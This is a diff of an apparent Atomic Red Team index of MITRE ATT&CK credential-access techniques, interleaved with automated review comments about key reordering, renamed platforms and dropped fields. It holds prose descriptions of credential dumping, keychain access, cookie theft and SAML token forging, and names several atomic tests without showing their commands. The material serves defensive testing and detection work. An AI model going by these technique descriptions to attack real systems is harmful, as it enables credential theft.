identifier: T1556.003
atomic_tests: []
T1056.001:
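Review bot: `- x_mitre_permissions_required:` / `- - root` is dropped from T1556.003 with no replacement, so a consumer that used that field to flag root-only techniques loses the signal for this entry; if the field is being retired across the index, note it alongside the key reorder. Separately, the unchanged context lines of the description show the literal tokens `pam_unix.so`, `/etc/passwd` and `/etc/shadow` broken onto their own lines with the following `, which retrieves` and `.(Citation: Apple PAM)` starting the next line, which looks like inline code markup stripped during generation; it predates this change but the block-scalar description will render with stray line breaks until the generator preserves or unwraps those spans.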
@@ -48434,7 +49096,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests:
- name: MacOS Swift Keylogger
@@ -48474,7 +49135,7 @@ credential-access:
elevation_required: false
T1110.001:
technique:
- modified: '2023-10-16T16:57:41.743Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Guessing'
description: |-
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -48503,6 +49164,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Mohamed Kmal
@@ -48514,18 +49176,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -48552,14 +49214,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.001
atomic_tests: []
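Review bot: the two removals here (`- x_mitre_attack_spec_version: 3.2.0`, `- x_mitre_modified_by_ref: identity--c78cb6e5-...`) are moves, not deletions; both keys are re-added earlier in the same T1110.001 object, immediately after `phase_name: credential-access` and before `x_mitre_platforms`. The T1539 object further down gets the same treatment. The net effect is that T1110.001 and T1539 now have alphabetically ordered keys while T1021.006 and T1550.003 keep the older order with `x_mitre_attack_spec_version` after `object_marking_refs`; harmless for YAML parsing, but a stable key order in the generator would make these diffs reviewable.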
T1003:
technique:
- modified: '2024-04-18T23:47:41.667Z'
+ modified: '2024-10-15T15:12:43.034Z'
name: OS Credential Dumping
description: |
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -48683,12 +49342,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003
atomic_tests: []
T1539:
technique:
- modified: '2024-04-16T12:56:56.861Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Web Session Cookie
description: |-
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -48703,10 +49361,11 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Johann Rehberger
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Monitor for attempts to access files and repositories on
a local system that are used to store browser session cookies. Monitor for
@@ -48714,14 +49373,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Access'
- 'File: File Access'
@@ -48764,9 +49423,6 @@ credential-access:
url: https://blog.talosintelligence.com/roblox-scam-overview/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1539
atomic_tests:
- name: Steal Chrome Cookies via Remote Debugging (Mac)
@@ -48806,7 +49462,7 @@ credential-access:
elevation_required: false
T1003.002:
technique:
- modified: '2023-07-24T18:53:10.860Z'
+ modified: '2024-10-15T16:40:52.174Z'
name: 'OS Credential Dumping: Security Account Manager'
description: "Adversaries may attempt to extract credential material from the
Security Account Manager (SAM) database either through in-memory techniques
@@ -48861,14 +49517,13 @@ credential-access:
url: https://github.com/Neohapsis/creddump7
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.002
atomic_tests: []
T1552.005:
technique:
- modified: '2023-03-21T13:56:27.910Z'
+ modified: '2024-10-15T16:24:20.219Z'
name: 'Unsecured Credentials: Cloud Instance Metadata API'
description: |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -48919,14 +49574,13 @@ credential-access:
url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.005
atomic_tests: []
T1555.002:
technique:
- modified: '2024-03-29T16:37:34.772Z'
+ modified: '2024-10-15T16:41:18.638Z'
name: Securityd Memory
description: |-
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -48960,8 +49614,8 @@ credential-access:
external_id: T1555.002
- source_name: External to DA, the OS X Way
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
- source_name: Apple Dev SecurityD
description: Apple. (n.d.). Security Server and Security Agent. Retrieved
March 29, 2024.
@@ -48978,11 +49632,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.002:
technique:
- modified: '2023-03-30T21:01:48.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Cracking'
description: "Adversaries may use password cracking to attempt to recover usable
credentials, such as plaintext passwords, when credential material such as
@@ -49000,7 +49653,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mohamed Kmal
x_mitre_deprecated: false
@@ -49017,10 +49670,10 @@ credential-access:
- Linux
- macOS
- Windows
- - Office 365
- - Azure AD
- Network
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -49044,46 +49697,12 @@ credential-access:
url: https://en.wikipedia.org/wiki/Password_cracking
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1110.002
atomic_tests: []
T1555.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
- created: '2020-02-12T18:55:24.728Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1555.001
- url: https://attack.mitre.org/techniques/T1555/001
- - source_name: External to DA, the OS X Way
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- - source_name: Keychain Services Apple
- url: https://developer.apple.com/documentation/security/keychain_services
- description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
- - source_name: Empire Keychain Decrypt
- url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
- description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
- Retrieved April 14, 2022.
- - source_name: OSX Keychain Schaumann
- url: https://www.netmeister.org/blog/keychain-passwords.html
- description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
- store and retrieve passwords. Retrieved March 31, 2022.
- - source_name: Keychain Decryption Passware
- url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
- description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
- Retrieved April 13, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:35:39.985Z'
+ name: 'Credentials from Password Stores: Keychain'
description: "Adversaries may acquire credentials from Keychain. Keychain (or
Keychain Services) is the macOS credential management system that stores account
names, passwords, private keys, certificates, sensitive application data,
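Review bot: the T1555.001 block removed in this hunk carries `x_mitre_deprecated: false`, `revoked: false`, `x_mitre_version: '1.1'` and five external_references; the re-added block in the next hunk restores all of them, with the `External to DA, the OS X Way` URL updated to the same slideshare.net path used for T1555.002 above and its Retrieved date moved to September 12, 2024. `x_mitre_version` stays at '1.1' even though `modified` jumps to 2024-10-15, consistent with a reference-only change.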
@@ -49104,25 +49723,57 @@ credential-access:
file. Both methods require a password, where the default password for the
Login Keychain is the current user’s password to login to the macOS host.(Citation:
External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) "
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Credentials from Password Stores: Keychain'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Unlocking the keychain and using passwords from it is a very
common process, so there is likely to be a lot of noise in any detection technique.
Monitoring of system calls to the keychain can help determine if there is
a suspicious process trying to access it.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Process: OS API Execution'
- 'File: File Access'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+ created: '2020-02-12T18:55:24.728Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/001
+ external_id: T1555.001
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ - source_name: Keychain Services Apple
+ description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+ url: https://developer.apple.com/documentation/security/keychain_services
+ - source_name: Empire Keychain Decrypt
+ description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+ Retrieved April 14, 2022.
+ url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+ - source_name: OSX Keychain Schaumann
+ description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+ store and retrieve passwords. Retrieved March 31, 2022.
+ url: https://www.netmeister.org/blog/keychain-passwords.html
+ - source_name: Keychain Decryption Passware
+ description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+ Retrieved April 13, 2022.
+ url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.001
atomic_tests:
- name: Keychain Dump
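Review bot: `spec_version: '2.1'` is dropped from this technique object (and, judging by the later hunks, from every technique in the file) while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0; a consumer that validates the embedded objects as STIX 2.1 will now see them without the mandatory `spec_version` property, so confirm the index loader and any downstream validators do not rely on it. Everything else in the hunk is a key reorder plus the new `x_mitre_deprecated: false` and `revoked: false` flags; the description, detection text and the five citation keys are unchanged, and the `modified` timestamp is removed here rather than bumped, so check that it reappears in the reordered object.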
@@ -49178,42 +49829,7 @@ credential-access:
elevation_required: false
T1003.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
- type: attack-pattern
- created: '2020-02-21T16:22:09.493Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.004
- url: https://attack.mitre.org/techniques/T1003/004
- - source_name: Passcape LSA Secrets
- url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
- description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
- 2020.
- - source_name: Microsoft AD Admin Tier Model
- url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
- description: Microsoft. (2019, February 14). Active Directory administrative
- tier model. Retrieved February 21, 2020.
- - source_name: Tilbury Windows Credentials
- url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
- description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
- Mitigation, Defense. Retrieved February 21, 2020.'
- - source_name: ired Dumping LSA Secrets
- url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
- Retrieved February 21, 2020.
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-13T15:49:17.591Z'
name: 'OS Credential Dumping: LSA Secrets'
description: |-
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
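Review bot: the removals in this hunk (platforms, domains, contributors, `object_marking_refs`, `id`, `created`, `external_references`) are all reinstated further down in the same T1003.004 object, so this is a reorder rather than a deletion; the only value that actually changes is `modified` (2022-05-11 → 2024-08-13). When comparing, check that all five external references come back with the same `url` values. Separately, the unchanged context shows the description breaking after `HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets` with `. LSA secrets can also be dumped` on its own line, which looks like stripped inline code markup around the registry path; that predates this change but is worth fixing in the generator.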
@@ -49222,6 +49838,9 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -49229,31 +49848,63 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+ created: '2020-02-21T16:22:09.493Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/004
+ external_id: T1003.004
+ - source_name: Tilbury Windows Credentials
+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+ Mitigation, Defense. Retrieved February 21, 2020.'
+ url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+ - source_name: ired Dumping LSA Secrets
+ description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+ Retrieved February 21, 2020.
+ url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+ - source_name: Microsoft AD Admin Tier Model
+ description: Microsoft. (2019, February 14). Active Directory administrative
+ tier model. Retrieved February 21, 2020.
+ url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+ - source_name: Passcape LSA Secrets
+ description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+ 2020.
+ url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+ - source_name: Powersploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ url: https://github.com/mattifestation/PowerSploit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.004
atomic_tests: []
T1606.002:
technique:
- modified: '2024-03-01T17:55:56.116Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Forge Web Credentials: SAML token'
description: |-
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter
value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime
in a LifetimeTokenPolicy
.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
- An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+ An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Oleg Kolesnikov, Securonix
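Review bot: `x_mitre_permissions_required: [SYSTEM]` is removed from T1003.004 with no replacement field, so the privilege requirement now survives only in the prose ("Adversaries with SYSTEM access to a host"); anything downstream that read `x_mitre_permissions_required` (for example to derive an elevation hint for tests) needs to be checked, since the same field is dropped from the other techniques in this change. The re-added `external_references` keep the same `source_name` keys as before, including the stray "1" in "1Windows Credentials", which is the upstream text and must stay as-is so the `(Citation: Tilbury Windows Credentials)` lookup still resolves.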
@@ -49266,14 +49917,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- SaaS
- Windows
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
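Review bot: the platform list for T1606.002 replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` (keeping `SaaS`, `Windows`, `IaaS`), and the version bumps 1.3 → 1.4 accordingly. Any consumer that selects techniques by the old platform names, such as per-platform index files, will silently lose this technique unless its mapping is updated to the new names; please confirm those mappings were regenerated alongside this file.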
@@ -49314,14 +49965,11 @@ credential-access:
url: https://www.sygnia.co/golden-saml-advisory
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1606.002
atomic_tests: []
T1003.007:
technique:
- modified: '2024-04-10T16:41:01.496Z'
+ modified: '2024-10-15T15:13:32.253Z'
name: 'OS Credential Dumping: Proc Filesystem'
description: |-
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
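Review bot: the only changes here are the `spec_version` drop and the `modified` bump for T1003.007. In the unchanged context, the description reads `/proc//maps` and `/proc//mem`, which looks like a placeholder between the slashes was stripped on rendering, and the citation key `Picus Labs Proc cump 2022` carries an upstream typo; both predate this change and the key must be kept verbatim because the description cites it by that exact name.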
@@ -49384,81 +50032,79 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.007
atomic_tests: []
T1555.005:
technique:
+ modified: '2024-08-19T13:53:33.661Z'
+ name: Password Managers
+ description: |-
+ Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+ Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_contributors:
+ - Matt Burrough, @mattburrough, Microsoft
+ x_mitre_deprecated: false
+ x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+ for suspicious activity that could indicate searching in process memory of
+ password managers. \n\nConsider monitoring file reads surrounding known password
+ manager applications."
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Matt Burrough, @mattburrough, Microsoft
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ - 'Process: OS API Execution'
+ - 'File: File Access'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
created: '2021-01-22T16:08:40.629Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1555.005
url: https://attack.mitre.org/techniques/T1555/005
- - source_name: ise Password Manager February 2019
- url: https://www.ise.io/casestudies/password-manager-hacking/
- description: 'ise. (2019, February 19). Password Managers: Under the Hood
- of Secrets Management. Retrieved January 22, 2021.'
+ external_id: T1555.005
+ - source_name: Cyberreason Anchor December 2019
+ description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+ A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+ 10, 2020.'
+ url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- source_name: FoxIT Wocao December 2019
- url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
October 8, 2020.'
+ url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+ - source_name: ise Password Manager February 2019
+ description: 'ise. (2019, February 19). Password Managers: Under the Hood
+ of Secrets Management. Retrieved January 22, 2021.'
+ url: https://www.ise.io/casestudies/password-manager-hacking/
- source_name: Github KeeThief
- url: https://github.com/GhostPack/KeeThief
description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
2021.
+ url: https://github.com/GhostPack/KeeThief
- source_name: NVD CVE-2019-3610
- url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
Detail. Retrieved April 14, 2021.
- - source_name: Cyberreason Anchor December 2019
- url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
- A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
- 10, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
- name: Password Managers
- description: |-
- Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
- Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
- Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
